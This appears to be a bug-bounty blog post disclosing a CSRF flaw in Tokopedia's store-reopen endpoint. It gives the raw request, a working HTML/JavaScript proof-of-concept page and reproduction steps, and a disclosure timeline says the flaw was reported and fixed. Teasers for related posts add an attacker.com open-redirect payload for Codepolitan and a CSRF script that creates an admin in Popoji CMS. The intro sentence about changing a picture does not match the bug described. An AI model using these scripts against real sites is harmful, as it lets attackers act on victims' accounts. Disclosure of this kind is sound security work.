Tokopedia - CSRF On Open Store

CSRF Issue On Tokopedia, 

List of bug on Tokopedia :
-
http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-to-create-new-store-for.html
-
http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-report-item.html
-
http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-on.html
-
http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-login.html
-
http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-open-store.html
Halo,
Saya menemukan sebuah bug CSRF di tokopedia

Pendahuluan
bug ini bisa mengubah user picture di login seal

Vuln Request:


POST /ajax/shop/shop-status.pl?action=event_re_open HTTP/1.1
Host: www.tokopedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: null
Cookie: Some Cookie
Connection: close

action=event_re_open&s_id=[id toko]

POC Code:

<script>
function getMe(){
// retrieve page content
var xhr = new XMLHttpRequest();


// now execute the CSRF attack
xhr.open("POST", "https://www.tokopedia.com/ajax/shop/shop-status.pl?action=event_re_open", true);
xhr.withCredentials="true";
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.send('action=event_re_open&s_id=2055904');


}
</script>
<button onclick="getMe();">Let's Rock</button>

Step To Reproduce :
1. Edit id dengan id toko,
2. Save to html
3. Execute

Video : https://youtu.be/jM1M-_O2Egw ( private )

Timeline: 
- 7 April 2017 => Reporting
- 10 May => Fixing & Ask Document
- Waiting Bounty ( Will be edited )

Comments

Post a Comment

Popular posts from this blog

Open Redirect On Codepolitan.com

Image
Open Redirect On Codepolitan.com Description :  Open redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access. Impact : Force user go to untrusted website from codepolitan website Location of bug :  https://www.codepolitan.com/users/login?callback= Payload : http://attacker.com Reproduce : 1. Open https://www.cod...
Read more

Missing CSRF Token On Add Admin [Popoji CMS]

Image
Description: This is happen because when request add admin there's no CSRF token Step To Reproduce : <script>function getMe(){ // retrieve page content var xhr = new XMLHttpRequest(); // now execute the CSRF attack xhr.open("POST", "http://root/popoji/poadmin/ route.php?mod=user&act=addnew", true); xhr.withCredentials="true"; xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr.send('username=root&nama_lengkap=test&password=Mypass1337&repeatpass=Mypass1337&email=nosashan dy21%40gmail.com&no_telp=083833232954&level=1'); } </script> <button onclick="getMe();">Let's Rock</button> 1. Save code to .html 2. upload them to host 3. execute it. Video :  https://www.youtube.com/watch?v=1FXXuSiB6jo Fix & Mitigation : give token when request sensitive action. Note: them give me permission to disclose it, and th...
Read more